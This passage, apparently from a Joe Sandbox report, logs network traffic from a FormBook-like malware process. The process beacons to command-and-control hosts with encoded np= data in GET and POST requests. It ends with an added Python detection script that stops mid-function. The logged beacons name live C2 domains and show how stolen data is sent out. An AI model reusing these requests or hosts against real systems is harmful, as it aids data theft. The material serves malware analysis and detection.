              Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
              Sep 18, 2024 09:03:49.478799105 CEST | 1236 | IN | Data Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d
              Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
              Sep 18, 2024 09:03:49.478812933 CEST | 1236 | IN | Data Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
              Sep 18, 2024 09:03:49.478827000 CEST | 896 | IN | Data Raw: 20 2d 32 2e 35 30 30 31 34 39 2c 31 34 2e 33 33 33 34 33 20 2d 30 2e 31 36 36 37 35 39 2c 34 2e 35 30 30 36 32 20 30 2e 33 33 33 31 32 34 2c 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c
              Data Ascii: -2.500149,14.33343 -0.166759,4.50062 0.333124,8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323"
              Sep 18, 2024 09:03:49.478843927 CEST | 1236 | IN | Data Raw: 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20
              Data Ascii: ;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16
              Sep 18, 2024 09:03:49.478862047 CEST | 1236 | IN | Data Raw: 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37
              Data Ascii: 6.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.115
              Sep 18, 2024 09:03:49.478893042 CEST | 448 | IN | Data Raw: 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20
              Data Ascii: .474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path i
              Sep 18, 2024 09:03:49.479058027 CEST | 1236 | IN | Data Raw: 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33
              Data Ascii: -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:m
              Sep 18, 2024 09:03:49.479080915 CEST | 1236 | IN | Data Raw: 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36
              Data Ascii: 29" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
              Sep 18, 2024 09:03:49.483865023 CEST | 1236 | IN | Data Raw: 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31
              Data Ascii: stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              16 | 192.168.2.6 | 57969 | 162.0.213.94 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 18, 2024 09:03:51.352747917 CEST | 506 | OUT | GET /09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhM HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Sep 18, 2024 09:03:51.953883886 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:51 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 18, 2024 09:03:51.953902960 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20
              Data Ascii: style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="
              Sep 18, 2024 09:03:51.953913927 CEST | 448 | IN | Data Raw: 2e 33 33 65 2d 34 20 2d 30 2e 37 38 31 39 38 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38
              Data Ascii: .33e-4 -0.78198,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-wi
              Sep 18, 2024 09:03:51.953923941 CEST | 1236 | IN | Data Raw: 2e 31 32 38 39 37 20 6d 20 30 2e 35 31 32 31 35 39 2c 30 2e 31 38 32 35 38 20 63 20 2d 31 2e 39 31 34 36 30 33 2c 2d 30 2e 32 33 36 32 31 20 2d 33 2e 35 30 35 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33
              Data Ascii: .12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054
              Sep 18, 2024 09:03:51.953934908 CEST | 1236 | IN | Data Raw: 2e 31 39 38 33 34 35 2c 37 2e 30 31 30 38 20 2d 31 33 2e 31 39 37 35 35 35 2c 31 33 2e 33 34 33 33 20 2d 31 38 2e 37 38 31 33 37 39 2c 32 30 2e 30 31 30 34 38 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35
              Data Ascii: .198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.3434
              Sep 18, 2024 09:03:51.953946114 CEST | 1236 | IN | Data Raw: 22 6d 20 39 36 2e 38 31 32 35 2c 31 32 36 2e 32 32 34 39 38 20 63 20 36 2e 38 39 35 38 36 2c 36 2e 34 35 38 33 36 20 31 33 2e 37 39 31 37 2c 31 32 2e 39 31 36 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36
              Data Ascii: "m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -
              Sep 18, 2024 09:03:51.953958988 CEST | 1236 | IN | Data Raw: 2c 33 2e 37 37 31 33 38 20 33 2e 30 30 35 31 39 2c 35 2e 34 32 31 31 38 20 34 2e 31 38 33 38 2c 39 2e 31 39 32 36 32 20 31 2e 31 37 38 36 31 2c 33 2e 37 37 31 34 34 20 32 2e 34 37 34 37 37 2c 39 2e 36 36 33 31 20 31 2e 39 34 34 34 33 2c 32 33 2e
              Data Ascii: ,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;st
              Sep 18, 2024 09:03:51.953974009 CEST | 328 | IN | Data Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b
              Data Ascii: yle="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.172
              Sep 18, 2024 09:03:51.953989983 CEST | 1236 | IN | Data Raw: 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38 39 2c 32 2e 32 39 39 30 31 20 2d 30 2e 34 31 32 35 36 37 2c 35 2e 30 30 37 39 20
              Data Ascii: 68,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;f
              Sep 18, 2024 09:03:51.954003096 CEST | 224 | IN | Data Raw: 34 34 37 35 2c 2d 30 2e 37 30 37 31 36 20 33 2e 33 35 38 32 36 2c 2d 30 2e 31 37 36 37 32 20 36 2e 34 32 33 33 2c 2d 30 2e 31 37 36 37 32 20 39 2e 34 38 37 30 32 2c 2d 30 2e 35 38 39 32 32 20 33 2e 30 36 33 37 32 2c 2d 30 2e 34 31 32 35 31 20 36
              Data Ascii: 4475,-0.70716 3.35826,-0.17672 6.4233,-0.17672 9.48702,-0.58922 3.06372,-0.41251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
              Sep 18, 2024 09:03:51.958800077 CEST | 1236 | IN | Data Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 30 22 0a 20 20 20 20 20 20 20
              Data Ascii: oin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              17 | 192.168.2.6 | 57970 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 18, 2024 09:03:57.090363026 CEST | 791 | OUT | POST /efkd/ HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.angelenterprise.biz
              Referer: http://www.angelenterprise.biz/efkd/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 79 45 4d 73 7a 32 59 73 49 50 57 2f 36 38 77 33 45 70 6e 79 2f 58 5a 59 6d 4e 4f 64 50 52 42 62 45 56 44 48 32 6a 59 6f 70 45 37 4f 42 46 71 69 75 79 57 69 41 39 4f 6e 44 44 4c 33 75 45 74 42 56 58 7a 6d 33 4e 6d 65 6c 52 49 61 4a 44 6d 64 51 78 4c 33 43 79 74 51 4a 41 6f 71 31 6e 54 4d 70 4c 59 46 6e 72 67 49 59 63 43 2f 46 43 39 33 56 4e 66 53 5a 53 62 50 77 5a 36 79 44 48 6c 59 75 72 6b 6a 34 30 78 59 4e 38 5a 4a 78 6a 72 35 44 37 53 67 32 43 4b 4f 4c 4e 70 77 75 76 6f 2b 4d 45 57 38 77 75 54 58 6a 65 77 53 6c 50 4b 36 49 6a 4d 37 57 72 63 5a 72 35 37 70 78 7a 61 37
              Data Ascii: np=Fs3+mulucZCgyEMsz2YsIPW/68w3Epny/XZYmNOdPRBbEVDH2jYopE7OBFqiuyWiA9OnDDL3uEtBVXzm3NmelRIaJDmdQxL3CytQJAoq1nTMpLYFnrgIYcC/FC93VNfSZSbPwZ6yDHlYurkj40xYN8ZJxjr5D7Sg2CKOLNpwuvo+MEW8wuTXjewSlPK6IjM7WrcZr57pxza7


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              18 | 192.168.2.6 | 57971 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 18, 2024 09:03:59.641825914 CEST | 815 | OUT | POST /efkd/ HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.angelenterprise.biz
              Referer: http://www.angelenterprise.biz/efkd/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 6c 62 45 31 7a 48 6b 53 59 6f 6b 6b 37 4f 59 31 71 64 67 53 57 54 41 39 4b 46 44 48 4c 33 75 41 39 42 56 56 72 6d 77 2b 4f 5a 6b 42 49 55 52 7a 6d 66 55 78 4c 33 43 79 74 51 4a 42 59 4d 31 6e 37 4d 70 61 6f 46 67 2f 30 48 52 38 43 2b 43 43 39 33 52 4e 65 62 5a 53 62 58 77 62 4f 59 44 45 4e 59 75 72 55 6a 34 6c 78 62 48 38 5a 50 2b 44 72 73 51 72 58 75 7a 7a 32 4e 4b 64 45 55 32 6f 73 6f 4a 79 58 6d 73 64 54 30 78 4f 51 51 6c 4e 53 49 49 44 4d 52 55 72 6b 5a 35 75 33 4f 2b 48 2f 59 32 2f 56 4d 61 61 36 55 4a 66 41 70 51 5a 63 41 52 4d 56 4c 76 51 3d 3d
              Data Ascii: np=Fs3+mulucZCgxgIsxREsffW81cw3OJn2/XVYmI+rPClbE1zHkSYokk7OY1qdgSWTA9KFDHL3uA9BVVrmw+OZkBIURzmfUxL3CytQJBYM1n7MpaoFg/0HR8C+CC93RNebZSbXwbOYDENYurUj4lxbH8ZP+DrsQrXuzz2NKdEU2osoJyXmsdT0xOQQlNSIIDMRUrkZ5u3O+H/Y2/VMaa6UJfApQZcARMVLvQ==


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              19 | 192.168.2.6 | 57972 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 18, 2024 09:04:02.246539116 CEST | 1828 | OUT | POST /efkd/ HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.angelenterprise.biz
              Referer: http://www.angelenterprise.biz/efkd/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 46 73 33 2b 6d 75 6c 75 63 5a 43 67 78 67 49 73 78 52 45 73 66 66 57 38 31 63 77 33 4f 4a 6e 32 2f 58 56 59 6d 49 2b 72 50 43 74 62 45 6d 37 48 31 42 77 6f 72 45 37 4f 51 56 71 6d 67 53 57 4f 41 35 75 42 44 48 48 4a 75 43 31 42 55 32 6a 6d 78 50 4f 5a 74 42 49 55 4e 44 6d 65 51 78 4b 6a 43 32 41 59 4a 41 6b 4d 31 6e 37 4d 70 5a 77 46 32 37 67 48 64 63 43 2f 46 43 39 37 56 4e 65 7a 5a 53 44 74 77 62 61 69 43 31 74 59 75 4c 45 6a 72 6e 5a 62 4c 38 5a 4e 2f 44 71 70 51 71 72 6c 7a 7a 72 38 4b 64 42 7a 32 76 6b 6f 4c 47 61 67 30 4f 54 6a 6f 39 30 4b 39 65 75 4e 48 31 4e 68 61 5a 6b 65 32 63 6e 61 6a 55 72 59 31 71 63 62 65 4b 2f 35 4f 38 38 45 51 38 35 42 46 64 46 48 33 74 47 61 4e 6b 4a 64 38 56 6d 52 77 56 75 51 49 48 56 4d 34 51 74 73 72 37 50 79 62 42 61 53 65 38 55 2f 44 51 44 68 7a 32 38 34 67 4f 75 67 78 4c 61 47 65 71 2f 49 2f 34 6f 52 4b 62 44 6f 63 38 56 64 71 2b 74 71 6f 4f 52 38 43 6f 4d 4e 4d 54 67 50 69 6f 77 6e 64 77 45 76 2b 4b 48 52 6e 76 6b 4b 75 58 6d 34 4d 5a 4a 71 6b 7a 61 [TRUNCATED]
              Data Ascii: np=... [TRUNCATED; the visible prefix is the ASCII decoding of the Data Raw hex above]


              Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 57973 | Destination IP: 3.33.130.190 | Destination Port: 80
              Timestamp: Sep 18, 2024 09:04:05.399148941 CEST | Bytes transferred: 516 | Direction: OUT | Data:
              GET /efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM HTTP/1.1
              Host: www.angelenterprise.biz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Timestamp: Sep 18, 2024 09:04:05.880235910 CEST | Bytes transferred: 405 | Direction: IN | Data:
              HTTP/1.1 200 OK
              Server: openresty
              Date: Wed, 18 Sep 2024 07:04:05 GMT
              Content-Type: text/html
              Content-Length: 265
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 70 3d 49 75 66 65 6c 62 55 43 54 4b 4f 65 75 77 4d 43 38 45 55 4d 5a 70 36 52 6c 70 45 67 41 4a 44 49 78 31 74 64 35 63 33 35 65 79 56 62 43 47 33 49 7a 79 49 4b 6a 6e 33 53 57 30 61 67 70 78 65 73 4b 39 57 35 59 48 6d 33 76 54 30 41 46 46 6a 59 31 4d 54 37 6c 68 59 70 42 69 76 6e 53 44 62 61 42 33 35 2f 45 52 55 6d 2f 30 71 70 70 2b 59 59 2b 5a 49 30 57 72 47 34 45 7a 59 42 66 2f 69 41 53 67 53 42 77 65 67 3d 26 4f 34 73 30 3d 37 72 72 68 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM"}</script></head></html>


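Detection logic for the beacon shape in sessions 19 and 20, written as an added example that is not part of this Joe Sandbox report. Every heuristic is read off the requests above: a short directory on the C2 host, a single base64-looking np= value (POST body, or query string on the GET), a 4-character=5-character decoy pair on the GET, Referer equal to Origin plus the path, Connection: close, and an Android User-Agent sent from a Windows host. The sample requests are constructed (np= values shortened), the indicator threshold is my own choice, and parameters are split by hand because urllib's parse_qsl would turn the raw '+' in the np= value into spaces.

```python
"""Score HTTP requests for the FormBook C2 beacon shape captured above.

Added example, not part of the Joe Sandbox report. Heuristics come from the
traffic in this report; the threshold and sample requests are constructed.
"""
import re
from urllib.parse import urlsplit

B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{2,8}/$")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def split_params(qs: str):
    """Split k=v&k=v without percent-decoding: FormBook sends raw '+' and '/'
    inside the np= value, and urllib's parse_qsl would turn '+' into spaces."""
    pairs = []
    for part in qs.split("&"):
        if part:
            k, _, v = part.partition("=")
            pairs.append((k, v))
    return pairs


def formbook_indicators(raw: str, host_is_windows: bool = True):
    """Return the list of beacon traits present in one request."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    params = split_params(body if method == "POST" else url.query)
    hits = []
    if SHORT_DIR_RE.match(url.path):
        hits.append("short directory path")
    np_values = [v for k, v in params if k == "np"]
    if len(np_values) == 1 and B64_RE.match(np_values[0]):
        hits.append("single base64-like np= parameter")
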